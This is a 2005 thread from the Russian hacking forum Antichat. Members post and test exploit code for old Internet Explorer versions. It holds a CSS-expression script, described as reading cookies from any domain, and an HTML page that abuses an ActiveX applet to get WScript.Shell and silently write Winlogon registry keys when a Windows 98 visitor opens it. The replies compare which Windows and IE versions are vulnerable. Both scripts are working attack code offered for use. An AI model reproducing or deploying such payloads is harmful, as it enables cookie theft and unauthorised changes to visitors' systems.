Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Уязвимости (https://forum.antichat.xyz/forumdisplay.php?f=74)
-   -   Универсальный Xss в Ie (https://forum.antichat.xyz/showthread.php?t=7308)

JazzzSummerMan 20.06.2005 22:00
Универсальный Xss в Ie
 
с помощью этого скрипта можно получить доступ к cookies любого домена
Код:
<SCRIPT>
showModalDialog("http://forum.antichat.ru",null,"font-size:expression(window.execScript(unescape('alert%28%22Domain%3A%22+document.domain+%22%5CnCookie%3A%22+document.cookie%29%3Bwindow.close%28%29%3B')))");
</SCRIPT>
взял с секлаба

censored! 20.06.2005 22:21
Там в верху год пишется: 4 декабря 2002

JazzzSummerMan 20.06.2005 22:27
да хоть 99-й

censored! 20.06.2005 22:29
И у тебя он пашет???

JazzzSummerMan 20.06.2005 22:31
Вложений: 1
хм.. пашет..

форум просто меняет код. вот в тхт если что

Че Гевара 20.06.2005 22:31
Да дело не в этом, просто в большинстве броузеров это не сработает ...
xp sp2 не пашет, на sp1 думаю тоже ...
ИМХО, только на IE ниже 5 версии (или 5, хз)

Надо проверить ...
Цитата:
хм.. пашет..
хехе, на тебе что не проверяй - все пашет ))

JazzzSummerMan 20.06.2005 22:36
Работает в шестой версии, проверялось на XPSP1, ну и на Win 98)
да и вобще такого типа уязвимость от ОС вряд ли зависит. только от версии IE

Че Гевара 20.06.2005 22:50
Цитата:
да и вобще такого типа уязвимость от ОС вряд ли зависит. только от версии IE
Тут дело в изменениях в плане безопасности, появившихся во втором сервис паке + некоторые другие факторы, такие как наличие фаервола с фильтрацией интерактивных элементов, наличе, изменения каких-либо настроек (в частности отключение ActiveX ) и т.п. ...

Кстати, вот например эксплоит с переполнением буфера через <iframe> работает только на xp или xp sp1. Под 2k или sp2 он просто вешает осла, при этом никакие команды не выполняются.
Так что от ОС очень даже зависит ...

JazzzSummerMan 20.06.2005 23:07
Ну почти.. я не то немного имел ввиду. Здесь именно такая уязвимость имхо
Вот ДоС или переполнения буфера зависят от ОС, а здесь уже не затрагивается движок проводника, а ошибка чисто в надстройках, поэтому и говорю. Ну если конечно рассматривать что в Sp входят патчи для Ie, то и от неё зависит. короче, ладно))

Algol 23.06.2005 12:50
На XP SP2 IE6 - не работает...
При попытке задания expression в опциях пишет Bad argument

censored! 23.06.2005 17:05
На 98-м (но с обнавлениями) с шестым ИЕ тоже не работает.
Завтра проверю на 98-х без обновлений и пятым ИЕ.
...
Если на то пошло (старье поднимаем) - также завтра притащю как при заходе на страницу в 98 (ИЕ5) реестр править. Причем - антивирусы (нортон и касперский) орут что там хрень какая-то, однако пропускают и можно редактировать ветки реестра (ну, или, сносить их).

censored! 24.06.2005 14:36
Для 98-го. Правит реестр (добавляя при загрузке винды приветственную надпись).
...
Код HTML:
<HTML><HEAD></HEAD><BODY>
<APPLET code=com.ms.activeX.ActiveXComponent height=0 width=0><PARAM NAME="code" VALUE="com.ms.activeX.ActiveXComponent"><PARAM NAME="height" VALUE="1"><PARAM NAME="width" VALUE="1"><PARAM NAME="codeBase" VALUE="http://www.antichat.ru"></APPLET>
<SCRIPT language=JAVASCRIPT>
<!--
InterfaceObject=document.applets[0];
setTimeout("Run()",1000);
function Run()
{
regkey = "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Winlogon\\LegalNoticeCaption"
regparam = "Велкам!"
WshShellClassID="{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}";
InterfaceObject.setCLSID(WshShellClassID);
wshShell = InterfaceObject.createInstance();
wshShell.regwrite(regkey,regparam)
regkey = "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Winlogon\\LegalNoticeText"
regparam = "Добро пожаловать на Античат | http://www.antichat.ru"
wshShell.regwrite(regkey,regparam)
}
-->
</SCRIPT></BODY></HTML><noscript><noscript><plaintext><plaintext>
...
p.s. в конце <noscript><noscript><plaintext><plaintext> это для "резки" банера на НАрод_Ру


Время: 03:26